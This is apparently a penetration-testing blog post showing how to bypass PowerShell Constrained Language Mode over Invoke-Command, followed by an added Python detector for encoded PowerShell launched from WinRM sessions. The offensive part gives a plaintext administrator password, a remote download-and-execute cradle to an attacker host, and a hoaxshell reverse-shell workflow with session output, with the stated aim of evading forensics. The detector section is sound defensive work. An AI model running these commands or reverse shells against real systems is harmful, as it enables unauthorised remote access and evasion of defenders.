This article shows how you could bypass CLM (Constrained Language Mode) with Invoke-Command, and how to get a better shell than the one Invoke-Command itself gives you.
Introduction
Invoke-Command is a PowerShell cmdlet that runs commands on local and remote computers. However, it is based on CMD terminal syntax, so if we need to run a PowerShell command through it, we need to add some extra statements.
Invoke-Command CLM Mode Example
This is an example from an Active Directory pentest in which I needed to use Invoke-Command to access another PC.
C:\Windows\system32>powershell
powershell
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> $passwd = ConvertTo-SecureString '%U;rO,]1qo7' -AsPlainText -Force
PS C:\Windows\system32> $creds = New-Object System.Management.Automation.PSCredential("test\Administrator", $passwd)
PS C:\Windows\system32> $creds

UserName             Password
--------             --------
test\Administrator   System.Security.SecureString
PS C:\Windows\system32> Invoke-Command -Credential $creds -ComputerName 172.16.200.3 -ScriptBlock {whoami}
Invoke-Command -Credential $creds -ComputerName 172.16.200.3 -ScriptBlock {whoami}
lab-info-sys\administrator
PS C:\Windows\system32> Invoke-Command -Credential $creds -ComputerName 172.16.200.3 -ScriptBlock {cmd /c "powershell.exe iex(new-object net.webclient).downloadstring('http://192.168.100.3:8000/bypass.ps1')"}
Invoke-Command -Credential $creds -ComputerName 172.16.200.3 -ScriptBlock {cmd /c "powershell.exe iex(new-object net.webclient).downloadstring('http://192.168.100.3:8000/bypass.ps1')"}
PS C:\Windows\system32> new-object : Cannot create type. Only core types are supported in this
language mode.
+ CategoryInfo : NotSpecified: (new-object : Ca... language mode.
:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
+ PSComputerName : 172.16.200.3
At line:1 char:5
+ iex(new-object net.webclient).downloadstring('http://192.168.100.3:80 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (:) [New-Object],
PSNotSupportedException
+ FullyQualifiedErrorId : CannotCreateTypeConstrainedLanguage,Microsoft.Pow
erShell.Commands.NewObjectCommand
NotSpecified: ( :String) [], RemoteException
As you can see, we could not get the reverse shell using PowerShell. The reason for using PowerShell is to make the payload harder to investigate and find: if we used an executable file, the defender could use digital forensics to trace us back through reverse engineering.
A simple way to bypass CLM Mode without writing a script
We can use hoaxshell to do that. First, we need to download hoaxshell.
The syntax looks like this:
python3 hoaxshell.py -s <attacker-ip> -p <attacker-port> -cm
Example
On our machine:
┌──(iwin㉿kali)-[~/hoaxshell]
└─$ python3 hoaxshell.py -s 192.168.100.3 -p 9096 -cm
┬ ┬ ┌─┐ ┌─┐ ─┐ ┬ ┌─┐ ┬ ┬ ┌─┐ ┬ ┬
├─┤ │ │ ├─┤ ┌┴┬┘ └─┐ ├─┤ ├┤ │ │
┴ ┴ └─┘ ┴ ┴ ┴ └─ └─┘ ┴ ┴ └─┘ ┴─┘ ┴─┘
by t3l3machus
[Info] Generating reverse shell payload...
powershell -e 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
Copied to clipboard!
On the client-side machine:
PS C:\Windows\system32> Invoke-Command -Credential $creds -ComputerName 172.16.200.3 -ScriptBlock {cmd /c "powershell -e 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"}
Back on our machine, the listener output continues:
[Info] Type "help" to get a list of the available prompt commands.
[Info] Http Server started on port 9096.
[Important] Awaiting payload execution to initiate shell session...
[Shell] Payload execution verified!
[Shell] Stabilizing command prompt...
PS C:\Users\Administrator.LAB-INFO-SYS\Documents > whoami;hostname
lab-info-sys\administrator
Lab-Info-Sys
PS C:\Users\Administrator.LAB-INFO-SYS\Documents >
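From the defender's side, the chain shown above leaves a recognisable trace: the WinRM host process (wsmprovhost.exe) spawns cmd.exe, which in turn launches powershell.exe with an encoded command. The following Python is an added example, not part of the original post or of hoaxshell: it decodes the -e / -EncodedCommand argument (base64 of UTF-16LE text, the format powershell.exe expects) and flags process-creation events that match the pattern. The event field names (Image, ParentImage, CommandLine) follow Sysmon Event ID 1, and the events themselves are constructed with a harmless "Write-Output hello" payload so the code runs offline.

```python
import base64
import re

# powershell.exe accepts -EncodedCommand, -ec and -e (other unambiguous
# prefixes exist too; widen this pattern for production use). The argument
# is base64 of UTF-16LE text, so only base64 characters are captured.
ENCODED_FLAG = re.compile(
    r"(?<!\S)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE
)

# Process that hosts remote sessions created by Invoke-Command / Enter-PSSession.
REMOTE_SESSION_HOSTS = {"wsmprovhost.exe"}


def encode_powershell_command(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64: str) -> str:
    """Reverse of -EncodedCommand. Returns '' if the argument does not decode."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyze_events(events):
    """Return one finding per event whose command line carries an encoded
    PowerShell command; severity is raised when the parent is the WinRM host."""
    findings = []
    for ev in events:
        match = ENCODED_FLAG.search(ev.get("CommandLine", ""))
        if not match:
            continue
        parent = ev.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
        if parent in REMOTE_SESSION_HOSTS:
            severity = "high"
            reason = "encoded PowerShell launched from a WinRM session host"
        else:
            severity = "medium"
            reason = "encoded PowerShell command line"
        findings.append({
            "image": ev.get("Image", ""),
            "severity": severity,
            "reason": reason,
            "decoded": decode_encoded_command(match.group(1)),
        })
    return findings


# Constructed sample events (not real telemetry). The first two reproduce the
# wsmprovhost.exe -> cmd.exe -> powershell.exe -e <payload> chain; the third is
# a benign script launch that must not be flagged.
_PAYLOAD = encode_powershell_command("Write-Output hello")
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\wsmprovhost.exe",
     "CommandLine": 'cmd /c "powershell -e ' + _PAYLOAD + '"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell -e " + _PAYLOAD},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -ep Bypass -File C:\scripts\backup.ps1"},
]

if __name__ == "__main__":
    for finding in analyze_events(SAMPLE_EVENTS):
        print(f"[{finding['severity']}] {finding['image']}: {finding['reason']}")
        print(f"    decoded: {finding['decoded']!r}")
```

Decoding the argument is what turns an opaque blob into something an analyst can read; in a real pipeline the decoded text would be fed to further rules (download cradles, known stager strings) rather than just printed. Note that `-ep Bypass` is deliberately not matched, since the regex requires whitespace directly after the -e/-ec/-enc form.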
Conclusion
Some EDR/AV products might block hoaxshell, and then you need to write the payload yourself. I am still learning Windows EDR/AV bypass techniques for OSEP, CESC-AS and CRTL. If you are interested in learning more, they are great courses that provide a lab and teach you how to bypass Windows EDR/AV.